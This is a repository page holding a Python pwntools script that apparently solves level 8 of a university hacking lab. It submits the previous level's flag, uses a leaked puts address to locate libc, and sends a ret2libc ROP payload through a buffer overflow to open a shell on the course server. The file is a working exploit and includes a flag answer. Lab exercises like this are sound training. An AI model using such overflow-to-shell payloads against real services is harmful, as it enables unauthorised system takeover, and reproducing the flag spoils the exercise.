ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8bfc87cd66a4ff5d7785795d2959e54d57647d5a
hacklab/4/level8/test.py
Eggert Jung 5ac340e112 8
2026-01-07 17:29:41 +01:00

53 lines
1.4 KiB
Python
Raw Blame History

# 0x0000000000401293 : pop rdi ; ret
from pwn import *
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008
p = remote(HOST, PORT)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
payload = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
#p = process('./level8')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
system_offset = libc.symbols['system'] # e.g. 0x04f550
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))
#help_input = p.recvline()
help_input = p.recvline()
print(help_input)
puts_abs = int(help_input[-15:-1],16)
print(hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
payload += p64(0x0000000000401294)
payload += p64(0x0000000000401293)
payload += p64(puts_abs - puts_offset + binsh_offset)
payload += p64(puts_abs - puts_offset + system_offset)
p.sendline(payload)
print("payload: ",payload)
p.interactive()
Reference in New Issue View Git Blame Copy Permalink